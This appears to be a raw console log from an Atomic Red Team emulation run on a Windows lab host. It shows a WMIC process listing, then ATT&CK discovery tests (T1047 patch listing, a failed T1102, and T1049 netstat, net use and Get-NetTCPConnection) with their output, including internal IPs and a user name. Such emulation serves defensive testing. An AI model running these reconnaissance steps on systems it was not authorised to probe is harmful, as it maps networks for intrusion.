6409SecurityHealthService.exe
6410
6411svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s LanmanServer c:\windows\system32\svchost.exe
6412
6413svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s TrkWks c:\windows\system32\svchost.exe
6414
6415vulnservice.exe C:\vulnerableservice\vulnservice.exe C:\vulnerableservice\vulnservice.exe
6416
6417svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s WpnService c:\windows\system32\svchost.exe
6418
6419Ec2Config.exe "C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe" C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
6420
6421svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s WdiServiceHost c:\windows\system32\svchost.exe
6422
6423svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s LicenseManager c:\windows\system32\svchost.exe
6424
6425svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p c:\windows\system32\svchost.exe
6426
6427svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s WinRM c:\windows\system32\svchost.exe
6428
6429WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe
6430
6431svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc c:\windows\system32\svchost.exe
6432
6433svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker c:\windows\system32\svchost.exe
6434
6435svchost.exe c:\windows\system32\svchost.exe -k appmodel -p -s StateRepository c:\windows\system32\svchost.exe
6436
6437svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc c:\windows\system32\svchost.exe
6438
6439svchost.exe c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -p -s SSDPSRV c:\windows\system32\svchost.exe
6440
6441sedsvc.exe "C:\Program Files\rempl\sedsvc.exe" C:\Program Files\rempl\sedsvc.exe
6442
6443SgrmBroker.exe
6444
6445svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc c:\windows\system32\svchost.exe
6446
6447SearchIndexer.exe C:\Windows\system32\SearchIndexer.exe /Embedding C:\Windows\system32\SearchIndexer.exe
6448
6449svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s PcaSvc c:\windows\system32\svchost.exe
6450
6451svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s StorSvc c:\windows\system32\svchost.exe
6452
6453svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s DsSvc c:\windows\system32\svchost.exe
6454
6455svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s Appinfo c:\windows\system32\svchost.exe
6456
6457csrss.exe
6458
6459winlogon.exe winlogon.exe C:\Windows\system32\winlogon.exe
6460
6461fontdrvhost.exe "fontdrvhost.exe" C:\Windows\system32\fontdrvhost.exe
6462
6463dwm.exe "dwm.exe" C:\Windows\system32\dwm.exe
6464
6465svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s ScDeviceEnum c:\windows\system32\svchost.exe
6466
6467rdpclip.exe rdpclip c:\windows\system32\rdpclip.exe
6468
6469sihost.exe sihost.exe c:\windows\system32\sihost.exe
6470
6471svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc c:\windows\system32\svchost.exe
6472
6473svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup -s WpnUserService c:\windows\system32\svchost.exe
6474
6475taskhostw.exe taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} c:\windows\system32\taskhostw.exe
6476
6477svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s TabletInputService c:\windows\system32\svchost.exe
6478
6479ctfmon.exe "ctfmon.exe" C:\Windows\system32\ctfmon.exe
6480
6481explorer.exe C:\Windows\Explorer.EXE C:\Windows\Explorer.EXE
6482
6483dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} C:\Windows\system32\DllHost.exe
6484
6485ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
6486
6487SearchUI.exe "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
6488
6489RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding C:\Windows\System32\RuntimeBroker.exe
6490
6491RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding C:\Windows\System32\RuntimeBroker.exe
6492
6493ApplicationFrameHost.exe C:\Windows\system32\ApplicationFrameHost.exe -Embedding C:\Windows\system32\ApplicationFrameHost.exe
6494
6495MicrosoftEdge.exe "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
6496
6497browser_broker.exe C:\Windows\system32\browser_broker.exe -Embedding C:\Windows\system32\browser_broker.exe
6498
6499svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted C:\Windows\System32\svchost.exe
6500
6501Windows.WARP.JITService.exe C:\Windows\system32\Windows.WARP.JITService.exe 1174e633-7db0-41dc-b8c5-c29e19241557 S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194 S-1-5-21-47903322-2936176756-2312637138-1103 528 C:\Windows\system32\Windows.WARP.JITService.exe
6502
6503RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding C:\Windows\System32\RuntimeBroker.exe
6504
6505MicrosoftEdgeCP.exe "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
6506
6507MicrosoftEdgeCP.exe "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
6508
6509svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s lfsvc c:\windows\system32\svchost.exe
6510
6511RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding C:\Windows\System32\RuntimeBroker.exe
6512
6513MSASCuiL.exe "C:\Program Files\Windows Defender\MSASCuiL.exe" C:\Program Files\Windows Defender\MSASCuiL.exe
6514
6515OneDrive.exe /updateInstalled /background C:\Users\pgustavo\AppData\Local\Microsoft\OneDrive\OneDrive.exe
6516
6517svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup c:\windows\system32\svchost.exe
6518
6519dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} C:\Windows\system32\DllHost.exe
6520
6521powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6522
6523conhost.exe \??\C:\Windows\system32\conhost.exe 0x4 C:\Windows\system32\conhost.exe
6524
6525cmd.exe "C:\Windows\system32\cmd.exe" C:\Windows\system32\cmd.exe
6526
6527conhost.exe \??\C:\Windows\system32\conhost.exe 0x4 C:\Windows\system32\conhost.exe
6528
6529powershell.exe powershell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6530
6531Sysmon64.exe C:\Windows\Sysmon64.exe C:\Windows\Sysmon64.exe
6532
6533unsecapp.exe C:\Windows\system32\wbem\unsecapp.exe -Embedding C:\Windows\system32\wbem\unsecapp.exe
6534
6535Simplerity.Service.exe "C:\Program Files (x86)\Simplerity\Service\Simplerity.Service.exe" -displayname "Simplerity" -servicename "Simplerity" C:\Program Files (x86)\Simplerity\Service\Simplerity.Service.exe
6536
6537osqueryd.exe C:\ProgramData\osquery\osqueryd\osqueryd.exe --flagfile=\ProgramData\osquery\osquery.flags C:\ProgramData\osquery\osqueryd\osqueryd.exe
6538
6539packetbeat.exe "C:\Program Files (x86)\Simplerity\Packetbeat\packetbeat.exe" -c "C:\Program Files (x86)\Simplerity\Packetbeat\packetbeat.yml" -path.home "C:\Program Files (x86)\Simplerity\Packetbeat" -path.data "C:\Program Files (x86)\Simplerity\Packetbeat" -path.logs "C:\Program Files (x86)\Simplerity\Packetbeat\logs" C:\Program Files (x86)\Simplerity\Packetbeat\packetbeat.exe
6540
6541osqueryd.exe C:\ProgramData\osquery\osqueryd\osqueryd.exe --flagfile=\ProgramData\osquery\osquery.flags C:\ProgramData\osquery\osqueryd\osqueryd.exe
6542
6543conhost.exe \??\C:\Windows\system32\conhost.exe 0x4 C:\Windows\system32\conhost.exe
6544
6545atom.exe "C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe" C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe
6546
6547atom.exe C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe --reporter-url=https://atom.io/crash_reports --application-name=Atom "--crashes-directory=C:\Users\pgustavo\AppData\Local\Temp\Atom Crashes" --v=1 C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe
6548
6549atom.exe "C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe" --type=renderer --enable-experimental-web-platform-features --no-sandbox --enable-features=FixAltGraph --service-pipe-token=DFF39255F0DDEB1BC18ABAFC48C2BFA5 --lang=en-US --app-user-model-id=com.squirrel.atom.x64 --app-path="C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\resources\app.asar" --node-integration=true --webview-tag=true --no-sandbox --background-color=#fff --disable-blink-features=Auxclick --device-scale-factor=1 --num-raster-threads=1 --enable-compositor-image-animations --service-request-channel-token=DFF39255F0DDEB1BC18ABAFC48C2BFA5 --renderer-client-id=4 --mojo-platform-channel-handle=2044 /prefetch:1 C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe
6550
6551atom.exe "C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe" --type=renderer --enable-experimental-web-platform-features --no-sandbox --enable-features=FixAltGraph --disable-gpu-compositing --service-pipe-token=53773022321A4EED152C3B74614C757A --lang=en-US --app-user-model-id=com.squirrel.atom.x64 --app-path="C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\resources\app.asar" --node-integration=true --webview-tag=true --no-sandbox --background-color=#fff --device-scale-factor=1 --num-raster-threads=1 --enable-compositor-image-animations --service-request-channel-token=53773022321A4EED152C3B74614C757A --renderer-client-id=7 --mojo-platform-channel-handle=3752 /prefetch:1 C:\Users\pgustavo\AppData\Local\atom\app-1.40.1\atom.exe
6552
6553Taskmgr.exe "C:\Windows\system32\taskmgr.exe" /4 C:\Windows\system32\taskmgr.exe
6554
6555winlogbeat.exe "C:\Program Files (x86)\Simplerity\Winlogbeat\winlogbeat.exe" -c "C:\Program Files (x86)\Simplerity\Winlogbeat\winlogbeat.yml" -path.home "C:\Program Files (x86)\Simplerity\Winlogbeat" -path.data "C:\Program Files (x86)\Simplerity\Winlogbeat" -path.logs "C:\Program Files (x86)\Simplerity\Winlogbeat\logs" C:\Program Files (x86)\Simplerity\Winlogbeat\winlogbeat.exe
6556
6557svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost C:\Windows\System32\svchost.exe
6558
6559svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc C:\Windows\system32\svchost.exe
6560
6561smartscreen.exe C:\Windows\System32\smartscreen.exe -Embedding C:\Windows\System32\smartscreen.exe
6562
6563chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6564
6565chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\pgustavo\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\pgustavo\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\pgustavo\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=76.0.3809.100 --initial-client-data=0x84,0x88,0x8c,0x7c,0x90,0x7ff9433aef08,0x7ff9433aef18,0x7ff9433aef28 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6566
6567chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=6216 --on-initialized-event-handle=60 --parent-handle=460 /prefetch:6 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6568
6569chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1372,8280614261159642234,9109957191709066743,131072 --gpu-preferences=IAAAAAAAAADgAAAgAAAAAAAAYAAAAAAACAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAABQAAABAAAAAAAAAAAAAAAAYAAAAQAAAAAAAAAAEAAAAFAAAAEAAAAAAAAAABAAAABgAAAA== --service-request-channel-token=3676783628043189960 --mojo-platform-channel-handle=1416 --ignored=" --type=renderer " /prefetch:2 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6570
6571chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --field-trial-handle=1372,8280614261159642234,9109957191709066743,131072 --lang=en-US --service-sandbox-type=network --service-request-channel-token=2370762229615929423 --mojo-platform-channel-handle=1960 /prefetch:8 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6572
6573chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1372,8280614261159642234,9109957191709066743,131072 --lang=en-US --enable-auto-reload --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=10552528432714314755 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2676 /prefetch:1 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6574
6575svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s BITS c:\windows\system32\svchost.exe
6576
6577chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1372,8280614261159642234,9109957191709066743,131072 --disable-gpu-compositing --lang=en-US --enable-auto-reload --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=6567715652249132525 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9156 /prefetch:1 C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
6578
6579WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe
6580
6581cmd.exe "C:\Windows\system32\cmd.exe" /c "wmic process get caption,executablepath,commandline" C:\Windows\system32\cmd.exe
6582
6583WMIC.exe wmic process get caption,executablepath,commandline C:\Windows\System32\Wbem\WMIC.exe
6584
6585
6586
6587Determining tests for Windows
6588Determining manual tests
6589[********BEGIN TEST*******]
6590Windows Management Instrumentation T1047
6591WMI Reconnaissance Software
6592WMI List Software
6593
6594Invoking Atomic Tests using defined executor
6595Performing the operation "Execute Atomic Test" on target "WMI Reconnaissance Software".
6596Command Prompt:
6597 wmic qfe get description,installedOn /format:csv
6598
6599Command Prompt:
6600 wmic qfe get description,installedOn /format:csv
6601
6602
6603
6604Node,Description,InstalledOn
6605
6606IT001,Update,8/15/2018
6607
6608IT001,Update,8/15/2018
6609
6610IT001,Security Update,8/15/2018
6611
6612IT001,Security Update,7/10/2019
6613
6614IT001,Security Update,7/10/2019
6615
6616IT001,Security Update,7/10/2019
6617
6618[!!!!!!!!END TEST!!!!!!!]
6619
6620
6621Executing T1102 technique
6622Attempting to run Atomic Techniques
6623Tarcking UUID is T1102_atomictest
6624Attempting to convert files from yaml
6625path: C:\AtomicRedTeam\atomics\T1102\T1102.yaml
6626file: C:\AtomicRedTeam\atomics\T1102\T1102.yaml
6627Converting C:\AtomicRedTeam\atomics\T1102\T1102.yaml from Yaml
6628Get-Content : Cannot find path 'C:\AtomicRedTeam\atomics\T1102\T1102.yaml' because it does not exist.
6629At C:\AtomicRedTeam\execution-frameworks\Invoke-AtomicRedTeam\Invoke-AtomicRedTeam\Public\Get-AtomicTechnique.ps1:41
6630char:49
6631+ ... $parsedYaml = ConvertFrom-Yaml (Get-Content $file -Raw)
6632+ ~~~~~~~~~~~~~~~~~~~~~~
6633 + CategoryInfo : ObjectNotFound: (C:\AtomicRedTea...1102\T1102.yaml:String) [Get-Content], ItemNotFoundEx
6634 ception
6635 + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
6636
6637Executing T1049 technique
6638Attempting to run Atomic Techniques
6639Tarcking UUID is T1049_atomictest
6640Attempting to convert files from yaml
6641path: C:\AtomicRedTeam\atomics\T1049\T1049.yaml
6642file: C:\AtomicRedTeam\atomics\T1049\T1049.yaml
6643Converting C:\AtomicRedTeam\atomics\T1049\T1049.yaml from Yaml
6644Determining tests for Windows
6645Determining manual tests
6646[********BEGIN TEST*******]
6647System Network Connections Discovery T1049
6648System Network Connections Discovery
6649Get a listing of network connections.
6650
6651Invoking Atomic Tests using defined executor
6652Performing the operation "Execute Atomic Test" on target "System Network Connections Discovery".
6653Command Prompt:
6654 netstat
6655net use
6656net sessions
6657
6658Command Prompt:
6659 netstat
6660net use
6661net sessions
6662
6663
6664Active Connections
6665
6666 Proto Local Address Foreign Address State
6667 TCP 127.0.0.1:50447 it001:50448 ESTABLISHED
6668 TCP 127.0.0.1:50448 it001:50447 ESTABLISHED
6669 TCP 172.18.39.105:3389 172.18.39.137:33948 ESTABLISHED
6670 TCP 172.18.39.105:49756 WECSERVER:5985 ESTABLISHED
6671 TCP 172.18.39.105:50326 52.242.211.89:https ESTABLISHED
6672 TCP 172.18.39.105:50422 ec2-34-251-232-252:https ESTABLISHED
6673 TCP 172.18.39.105:50449 ec2-34-251-232-252:https CLOSE_WAIT
6674 TCP 172.18.39.105:50464 ec2-54-77-209-233:https ESTABLISHED
6675 TCP 172.18.39.105:50649 ec2-54-77-209-233:https ESTABLISHED
6676 TCP 172.18.39.105:50680 lga15s43-in-f35:https ESTABLISHED
6677 TCP 172.18.39.105:50681 sfo03s18-in-f3:https ESTABLISHED
6678 TCP 172.18.39.105:50682 sfo03s18-in-f13:https ESTABLISHED
6679 TCP 172.18.39.105:50683 sfo07s17-in-f78:https ESTABLISHED
6680 TCP 172.18.39.105:50684 sfo07s26-in-f4:https ESTABLISHED
6681 TCP 172.18.39.105:50686 sfo03s18-in-f1:https ESTABLISHED
6682 TCP 172.18.39.105:50687 sfo07s26-in-f14:http ESTABLISHED
6683 TCP 172.18.39.105:50694 sfo03s18-in-f10:https ESTABLISHED
6684 TCP 172.18.39.105:50697 sfo07s13-in-f14:https ESTABLISHED
6685 TCP 172.18.39.105:50699 sfo03s07-in-f99:https ESTABLISHED
6686 TCP 172.18.39.105:50737 sfo07s16-in-f14:https ESTABLISHED
6687 TCP 172.18.39.105:50738 WECSERVER:5985 TIME_WAIT
6688 TCP 172.18.39.105:50740 WECSERVER:5985 ESTABLISHED
6689 TCP 172.18.39.105:50742 WECSERVER:5985 ESTABLISHED
6690 TCP 172.18.39.105:50747 WECSERVER:5985 TIME_WAIT
6691 TCP 172.18.39.105:50750 WECSERVER:5985 ESTABLISHED
6692 TCP 172.18.39.105:50751 HFDC1:epmap TIME_WAIT
6693 TCP 172.18.39.105:50752 HFDC1:49667 TIME_WAIT
6694 TCP 172.18.39.105:50753 a96-16-173-242:http ESTABLISHED
6695 TCP 172.18.39.105:50754 a104-92-135-151:http ESTABLISHED
6696 TCP 172.18.39.105:50756 WECSERVER:5985 ESTABLISHED
6697 TCP 172.18.39.105:50758 WECSERVER:5985 ESTABLISHED
6698 TCP 172.18.39.105:50760 WECSERVER:5985 ESTABLISHED
6699 TCP 172.18.39.105:50762 WECSERVER:5985 ESTABLISHED
6700 TCP 172.18.39.105:50763 40.90.137.125:https ESTABLISHED
6701 TCP 172.18.39.105:50764 52.158.208.111:https TIME_WAIT
6702 TCP 172.18.39.105:50765 169.254.169.254:http CLOSE_WAIT
6703New connections will be remembered.
6704
6705There are no entries in the list.
6706
6707There are no entries in the list.
6708
6709Determining tests for Windows
6710Determining manual tests
6711[********BEGIN TEST*******]
6712System Network Connections Discovery T1049
6713System Network Connections Discovery with PowerShell
6714Get a listing of network connections.
6715
6716Invoking Atomic Tests using defined executor
6717Performing the operation "Execute Atomic Test" on target "System Network Connections Discovery with PowerShell".
6718PowerShell:
6719 Get-NetTCPConnection
6720
6721PowerShell
6722 Get-NetTCPConnection
6723
6724
6725Caption :
6726Description :
6727ElementName :
6728InstanceID : ::++50422++::++0
6729CommunicationStatus :
6730DetailedStatus :
6731HealthState :
6732InstallDate :
6733Name :
6734OperatingStatus :
6735OperationalStatus :
6736PrimaryStatus :
6737Status :
6738StatusDescriptions :
6739AvailableRequestedStates :
6740EnabledDefault : 2
6741EnabledState :
6742OtherEnabledState :
6743RequestedState : 5
6744TimeOfLastStateChange :
6745TransitioningToState : 12
6746AggregationBehavior :
6747Directionality :
6748CreationTime : 9/3/2019 3:35:52 AM
6749LocalAddress : ::
6750LocalPort : 50422
6751OwningProcess : 8204
6752AppliedSetting :
6753OffloadState : InHost
6754RemoteAddress : ::
6755RemotePort : 0
6756State : Bound
6757PSComputerName :
6758
6759
6760Caption :
6761Description :
6762ElementName :
6763InstanceID : ::++49714++::++0
6764CommunicationStatus :
6765DetailedStatus :
6766HealthState :
6767InstallDate :
6768Name :
6769OperatingStatus :
6770OperationalStatus :
6771PrimaryStatus :
6772Status :
6773StatusDescriptions :
6774AvailableRequestedStates :
6775EnabledDefault : 2
6776EnabledState :
6777OtherEnabledState :
6778RequestedState : 5
6779TimeOfLastStateChange :
6780TransitioningToState : 12
6781AggregationBehavior :
6782Directionality :
6783CreationTime : 9/3/2019 3:08:36 AM
6784LocalAddress : ::
6785LocalPort : 49714
6786OwningProcess : 780
6787AppliedSetting :
6788OffloadState : InHost
6789RemoteAddress : ::
6790RemotePort : 0
6791State : Listen
6792PSComputerName :
6793
6794
6795Caption :
6796Description :
6797ElementName :
6798InstanceID : ::++49708++::++0
6799CommunicationStatus :
6800DetailedStatus :
6801HealthState :
6802InstallDate :
6803Name :
6804OperatingStatus :
6805OperationalStatus :
6806PrimaryStatus :
6807Status :
6808StatusDescriptions :
6809AvailableRequestedStates :
6810EnabledDefault : 2
6811EnabledState :
6812OtherEnabledState :
6813RequestedState : 5
6814TimeOfLastStateChange :
6815TransitioningToState : 12
6816AggregationBehavior :
6817Directionality :
6818CreationTime : 9/3/2019 3:08:36 AM
6819LocalAddress : ::
6820LocalPort : 49708
6821OwningProcess : 728
6822AppliedSetting :
6823OffloadState : InHost
6824RemoteAddress : ::
6825RemotePort : 0
6826State : Listen
6827PSComputerName :
6828
6829
6830Caption :
6831Description :
6832ElementName :
6833InstanceID : ::++49705++::++0
6834CommunicationStatus :
6835DetailedStatus :
6836HealthState :
6837InstallDate :
6838Name :
6839OperatingStatus :
6840OperationalStatus :
6841PrimaryStatus :
6842Status :
6843StatusDescriptions :
6844AvailableRequestedStates :
6845EnabledDefault : 2
6846EnabledState :
6847OtherEnabledState :
6848RequestedState : 5
6849TimeOfLastStateChange :
6850TransitioningToState : 12
6851AggregationBehavior :
6852Directionality :
6853CreationTime : 9/3/2019 3:08:31 AM
6854LocalAddress : ::
6855LocalPort : 49705
6856OwningProcess : 2732
6857AppliedSetting :
6858OffloadState : InHost
6859RemoteAddress : ::
6860RemotePort : 0
6861State : Listen
6862PSComputerName :
6863
6864
6865Caption :
6866Description :
6867ElementName :
6868InstanceID : ::++49672++::++0
6869CommunicationStatus :
6870DetailedStatus :
6871HealthState :
6872InstallDate :
6873Name :
6874OperatingStatus :
6875OperationalStatus :
6876PrimaryStatus :
6877Status :
6878StatusDescriptions :
6879AvailableRequestedStates :
6880EnabledDefault : 2
6881EnabledState :
6882OtherEnabledState :
6883RequestedState : 5
6884TimeOfLastStateChange :
6885TransitioningToState : 12
6886AggregationBehavior :
6887Directionality :
6888CreationTime : 9/3/2019 3:08:29 AM
6889LocalAddress : ::
6890LocalPort : 49672
6891OwningProcess : 780
6892AppliedSetting :
6893OffloadState : InHost
6894RemoteAddress : ::
6895RemotePort : 0
6896State : Listen
6897PSComputerName :
6898
6899
6900Caption :
6901Description :
6902ElementName :
6903InstanceID : ::++49671++::++0
6904CommunicationStatus :
6905DetailedStatus :
6906HealthState :
6907InstallDate :
6908Name :
6909OperatingStatus :
6910OperationalStatus :
6911PrimaryStatus :
6912Status :
6913StatusDescriptions :
6914AvailableRequestedStates :
6915EnabledDefault : 2
6916EnabledState :
6917OtherEnabledState :
6918RequestedState : 5
6919TimeOfLastStateChange :
6920TransitioningToState : 12
6921AggregationBehavior :
6922Directionality :
6923CreationTime : 9/3/2019 3:08:29 AM
6924LocalAddress : ::
6925LocalPort : 49671
6926OwningProcess : 2740
6927AppliedSetting :
6928OffloadState : InHost
6929RemoteAddress : ::
6930RemotePort : 0
6931State : Listen
6932PSComputerName :
6933
6934
6935Caption :
6936Description :
6937ElementName :
6938InstanceID : ::++49669++::++0
6939CommunicationStatus :
6940DetailedStatus :
6941HealthState :
6942InstallDate :
6943Name :
6944OperatingStatus :
6945OperationalStatus :
6946PrimaryStatus :
6947Status :
6948StatusDescriptions :
6949AvailableRequestedStates :
6950EnabledDefault : 2
6951EnabledState :
6952OtherEnabledState :
6953RequestedState : 5
6954TimeOfLastStateChange :
6955TransitioningToState : 12
6956AggregationBehavior :
6957Directionality :
6958CreationTime : 9/3/2019 3:08:29 AM
6959LocalAddress : ::
6960LocalPort : 49669
6961OwningProcess : 2428
6962AppliedSetting :
6963OffloadState : InHost
6964RemoteAddress : ::
6965RemotePort : 0
6966State : Listen
6967PSComputerName :
6968
6969
6970Caption :
6971Description :
6972ElementName :
6973InstanceID : ::++49666++::++0
6974CommunicationStatus :
6975DetailedStatus :
6976HealthState :
6977InstallDate :
6978Name :
6979OperatingStatus :
6980OperationalStatus :
6981PrimaryStatus :
6982Status :
6983StatusDescriptions :
6984AvailableRequestedStates :
6985EnabledDefault : 2
6986EnabledState :
6987OtherEnabledState :
6988RequestedState : 5
6989TimeOfLastStateChange :
6990TransitioningToState : 12
6991AggregationBehavior :
6992Directionality :
6993CreationTime : 9/3/2019 3:08:27 AM
6994LocalAddress : ::
6995LocalPort : 49666
6996OwningProcess : 1412
6997AppliedSetting :
6998OffloadState : InHost
6999RemoteAddress : ::
7000RemotePort : 0
7001State : Listen
7002PSComputerName :
7003
7004
7005Caption :
7006Description :
7007ElementName :
7008InstanceID : ::++49665++::++0
7009CommunicationStatus :
7010DetailedStatus :
7011HealthState :
7012InstallDate :
7013Name :
7014OperatingStatus :
7015OperationalStatus :
7016PrimaryStatus :
7017Status :
7018StatusDescriptions :
7019AvailableRequestedStates :
7020EnabledDefault : 2
7021EnabledState :
7022OtherEnabledState :
7023RequestedState : 5
7024TimeOfLastStateChange :
7025TransitioningToState : 12
7026AggregationBehavior :
7027Directionality :
7028CreationTime : 9/3/2019 3:08:27 AM
7029LocalAddress : ::
7030LocalPort : 49665
7031OwningProcess : 1444
7032AppliedSetting :
7033OffloadState : InHost
7034RemoteAddress : ::
7035RemotePort : 0
7036State : Listen
7037PSComputerName :
7038
7039
7040Caption :
7041Description :
7042ElementName :
7043InstanceID : ::++49664++::++0
7044CommunicationStatus :
7045DetailedStatus :
7046HealthState :
7047InstallDate :
7048Name :
7049OperatingStatus :
7050OperationalStatus :
7051PrimaryStatus :
7052Status :
7053StatusDescriptions :
7054AvailableRequestedStates :
7055EnabledDefault : 2
7056EnabledState :
7057OtherEnabledState :
7058RequestedState : 5
7059TimeOfLastStateChange :
7060TransitioningToState : 12
7061AggregationBehavior :
7062Directionality :
7063CreationTime : 9/3/2019 3:08:27 AM
7064LocalAddress : ::
7065LocalPort : 49664
7066OwningProcess : 660
7067AppliedSetting :
7068OffloadState : InHost
7069RemoteAddress : ::
7070RemotePort : 0
7071State : Listen
7072PSComputerName :
7073
7074
7075Caption :
7076Description :
7077ElementName :
7078InstanceID : ::++47001++::++0
7079CommunicationStatus :
7080DetailedStatus :
7081HealthState :
7082InstallDate :
7083Name :
7084OperatingStatus :
7085OperationalStatus :
7086PrimaryStatus :
7087Status :
7088StatusDescriptions :
7089AvailableRequestedStates :
7090EnabledDefault : 2
7091EnabledState :
7092OtherEnabledState :
7093RequestedState : 5
7094TimeOfLastStateChange :
7095TransitioningToState : 12
7096AggregationBehavior :
7097Directionality :
7098CreationTime : 9/3/2019 3:08:38 AM
7099LocalAddress : ::
7100LocalPort : 47001
7101OwningProcess : 4
7102AppliedSetting :
7103OffloadState : InHost
7104RemoteAddress : ::
7105RemotePort : 0
7106State : Listen
